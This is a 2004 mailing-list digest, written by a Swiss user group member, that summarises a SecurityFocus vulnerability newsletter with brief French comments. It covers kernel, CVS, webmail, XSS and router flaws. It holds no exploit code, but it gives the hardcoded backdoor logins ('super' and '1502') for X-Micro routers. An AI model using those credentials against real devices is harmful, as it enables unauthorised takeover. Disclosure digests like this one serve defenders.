[gull-annonces] Résumé SecurityFocus Newsletter #245

Marc SCHAEFER schaefer at alphanet.ch
Thu Apr 22 10:11:01 CEST 2004


[ la qualité de la source chez securityfocus a encore baissé ]

Open WebMail Arbitrary Directory Creation Vulnerability
BugTraq ID: 10087
Remote: Yes
Date Published: Apr 09 2004
Relevant URL: http://www.securityfocus.com/bid/10087
Summary:
It has been reported that Open WebMail may be prone to an arbitrary
directory creation vulnerability that may allow remote attackers to
create potentially malicious directories in the underlying file system
through the web interface.

Open WebMail versions 2.30 and prior are vulnerable to these issues,
however, the problem has been addressed in the product CVS.

Open WebMail est un Webmail GPL basé sur neomail
(http://www.neocodesolutions.com/software/neomail/)
http://openwebmail.org/


RSniff Remote Denial of Service Vulnerability
BugTraq ID: 10093
Remote: Yes
Date Published: Apr 09 2004
Relevant URL: http://www.securityfocus.com/bid/10093
Summary:
It has been reported that RSniff may be prone to a remote denial of
service issue when a client repeatedly connects to the RSniff daemon
and does not issue the 'AUTHENTICATE' command to log in or simply
closes the connection.  The server fails to accept new connections
after about 1024 malicious connection attempts have been made.

RSniff 1.0 has been reported to be prone to this issue.

RSniff is a Linux based protocol analyzer, designed for remote sniffing.
The server captures the packets, and the client GUI connects to control
it. The administrator can monitor any number of network nodes by running
the client and connecting to multiple servers. It is designed to capture
and analyze Ethernet, ARP, RARP, IP, ICMP, IGMP, TCP and UDP packets. 
Licence GPL

X-Micro WLAN 11b Broadband Router Backdoor Administration Ac...
BugTraq ID: 10095
Remote: Yes
Date Published: Apr 10 2004
Relevant URL: http://www.securityfocus.com/bid/10095
Summary:
It has been reported that the firmware shipped with the X-Micro 11b
Broadband Router has built-in an administrative account that cannot be
disabled.  The account, username and password "super", appears to be a
backdoor and may provide remote attackers possessing knowledge of the
account with complete control over the device.  According to the
author of the report, the built-in administration webserver listens on
both internal and external interfaces.  Attackers may authenticate
with the "super" account from outside of the LAN and gain control of
the device through this web interface.  Once authenticated, it is
possible for attackers to install new firmware on the device.

**It has been reported that version 1.6.0.1 of WLAN 11b Broadband
Router also contains a built-in an administrative account that cannot
be disabled.  The account, username and password "1502", appears to be
a backdoor and may provide remote attackers possessing knowledge of
the account with complete control over the device.

[ firmware ]

Linux Kernel Sigqueue Blocking Denial Of Service Vulnerabili...
BugTraq ID: 10096
Remote: No
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10096
Summary:
A vulnerability has been reported in the Linux Kernel that may permit
a malicious local user to affect a system-wide denial of service
condition.  This issue may be triggered via the Kernel signal queue
(struct sigqueue) and may be exploited to exhaust the system process
table by causing an excessive number of threads to be left in a zombie
state.

Il y a aussi une annonce qui viendra probablement la semaine prochaine
sur setsockopt(), concernant le kernel dès 2.4.22.

Eazel Nautilus Trash Folder Handler Buffer Overflow Vulnerab...
BugTraq ID: 10099
Remote: No
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10099
Summary:
Nautilus has been reported to be prone to a buffer overflow vulnerability.

The vulnerability is reported to present itself when Nautilus attempts
to delete a malicious directory and that directory is later operated
on in the "Trash" folder.

An attacker who has some degree of interactive access to an affected
system may attempt to exploit this vulnerability to execute code in
the context of the user who is invoking Nautilus file manager.

Blackboard Learning System Multiple Cross-Site Scripting Vul...
BugTraq ID: 10101
Remote: Yes
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10101
Summary:
Blackboard Learning System has been reported prone to multiple
cross-site scripting vulnerabilities. These issues are due to a
failure of the application to properly validate user supplied URI
input.

The first issue is reported to affect the "addressbook.pl" script.
The second issue is reported to affect the "tasks.pl" script. The
third issue is reported to affect three URI parameters, of the
"calendar.pl" script.

In all cases the user-supplied parameters are not sufficiently
sanitized prior to being rendered in the browser of the target user.

These issues could permit a remote attacker to create a malicious link
to the vulnerable application that includes hostile HTML and script
code. If this link were followed, the hostile code may be rendered in
the web browser of the victim user. This would occur in the security
context of the affected web site and may allow for theft of
cookie-based authentication credentials or other attacks.

(pas déterminé le langage)

http://www.cla.sc.edu/infosys/bb/

Citadel/UX Insecure File Permissions Vulnerability
BugTraq ID: 10102
Remote: No
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10102
Summary:
Citadel/UX has been reported prone to a weak file permissions
vulnerability. The issue is reported to present itself because
Citadel/UX sets insecure permissions on the "data" directory and files
contained within, during installation.

As a direct result of this, any user who has interactive shell access
to a system may disclose potentially sensitive data that is contained
in the Citadel/UX database and data files.

SurgeLDAP User.CGI Directory Traversal Vulnerability
BugTraq ID: 10103
Remote: Yes
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10103
Summary:
SurgeLDAP is prone to a directory traversal vulnerability in one of
the scripts included with the built-in web administrative server,
potentially resulting in disclosure of files.

A remote attacker could exploit this issue to gain access to system
files outside of the web root directory of the built-in web server.
Files that are readable by the web server could be disclosed via this
issue.

KDE Konqueror Bitmap File Processing Denial of Service Vulne...
BugTraq ID: 10107
Remote: Yes
Date Published: Apr 13 2004
Relevant URL: http://www.securityfocus.com/bid/10107
Summary:
It has been reported that Konqueror may be prone to a denial of
service vulnerability when processing malformed bitmap files.  An
attacker can cause a denial of service condition in the system by
specifying a large value for a bitmap file to be loaded by the
browser.

This attack may lead to a denial of service condition in the system to
the exhaustion of memory resources.

This vulnerability has been tested on KDE 3.2.1 running on a
Freebsd5.2-CURRENT system, however, it is possible that other versions
running on different platforms are vulnerable as well.  It is likely
that this issue is present in a shared KDE bitmap processing
component, presenting attack vectors in other applications that use
the component.

This vulnerability is similar to the issue described in BID 10097
(Microsoft Internet Explorer Bitmap File Processing Denial of Service
Vulnerability).

CVS Client RCS diff File Corruption Vulnerability
BugTraq ID: 10138
Remote: Yes
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10138
Summary:
A vulnerability has been discovered in the CVS client. It is reported
that a problem in the revision control system (RCS) diff files may
allow an attacker to create an arbitrary file on a remote system. The
file will be created with the privileges of the user who is invoking
the CVS client.

CVS Server Piped Checkout Access Validation Vulnerability
BugTraq ID: 10140
Remote: Yes
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10140
Summary:
CVS server has been reported prone to an access validation
vulnerability. It is reported that the CVS server does not
sufficiently validate piped checkouts. The CVS server may honor a
request for a piped checkout for a path that resides outside of the
cvsroot.

Data that is harvested in this manner may be used to aid in further
attacks that are launched against the target server.

Linux Kernel ISO9660 File System Buffer Overflow Vulnerabili...
BugTraq ID: 10141
Remote: No
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10141
Summary:
It has been reported that the Linux Kernel is prone to a local ISO9660
file system buffer overflow vulnerability.  This issue is due to a
failure of the application to properly validate buffer boundaries when
processing file system information.  An attacker must have adequate
permissions to mount the malicious file system to exploit the issue.
This is not enabled by default on a number of available Linux
distributions.

This issue may be exploited by an attacker to overflow and modify
kernel memory, potentially allowing the attacker to create an
arbitrary data structure in kernel memory.  This issue may be
leveraged to gain kernel level access to the affected system.

MySQL MYSQLD_Multi Insecure Temporary File Creation Vulnerab...
BugTraq ID: 10142
Remote: No
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10142
Summary:
mysqld_multi is reported prone to insecure temporary file
handling. The script likely creates temporary files with predictable
filenames.

An attacker may exploit this issue to launch symbolic link attacks
that will most likely result in corruption of files when the
vulnerable script is launched.

This issue would only affect Unix/Linux-based operating systems.

Linux Kernel JFS File System Information Leakage Vulnerabili...
BugTraq ID: 10143
Remote: No
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10143
Summary:
A vulnerability has been reported in the Linux Kernel that is related
to how JFS file systems are cleaned up.  In particular, a root user
may potentially gain access to private or sensitive information on
these file systems.

This really only poses a security risk if the root user is not
intended to access this information already.

Red Hat Linux GNU Mailman Remote Denial Of Service Vulnerabi...
BugTraq ID: 10147
Remote: Yes
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10147
Summary:
An update that was released by Red Hat(RHSA-2004:019) to address the
issue described in BID 9620 (GNU Mailman Malformed Message Remote
Denial Of Service Vulnerability), is reported to introduce a denial of
service vulnerability.

A remote attacker may exploit this vulnerability to cause the mailman
to crash, effectively denying service to legitimate users.

ssmtp Mail Transfer Agent Multiple Format String Vulnerabili...
BugTraq ID: 10150
Remote: Yes
Date Published: Apr 15 2004
Relevant URL: http://www.securityfocus.com/bid/10150
Summary:
It has been reported that ssmtp may be prone to multiple format string
vulnerabilities that could allow a remote attacker to execute
arbitrary code in the context of the vulnerable process.  A successful
attack may allow an attacker to gain root privileges.

Linux Kernel XFS File System Information Leakage Vulnerabili...
BugTraq ID: 10151
Remote: No
Date Published: Apr 15 2004
Relevant URL: http://www.securityfocus.com/bid/10151
Summary:
An information leakage vulnerability has been reported to exist in the
Linux kernel when writing to an XFS file system.  This issue is due to
a design error that causes some kernel information to be leaked.

It has been reported that this issue requires that the attacker be
able to read the raw device; an action which is restricted to
privileges users.  Due to the nature of the issue, this really only
poses a security risk if the privileged user is not intended to access
this information already.

Linux Kernel EXT3 File System Information Leakage Vulnerabil...
BugTraq ID: 10152
Remote: No
Date Published: Apr 15 2004
Relevant URL: http://www.securityfocus.com/bid/10152
Summary:
An information leakage vulnerability has been reported to exist in the
Linux kernel when writing to an ext3 file system.  This issue is due
to a design error that causes some kernel information to be leaked.

It has been reported that this issue requires that the attacker be
able to read the raw device; an action which is restricted to
privileged users.  Due to the nature of the issue, this really only
poses a security risk if the privileged user is not intended to access
this information already.




More information about the gull-annonces mailing list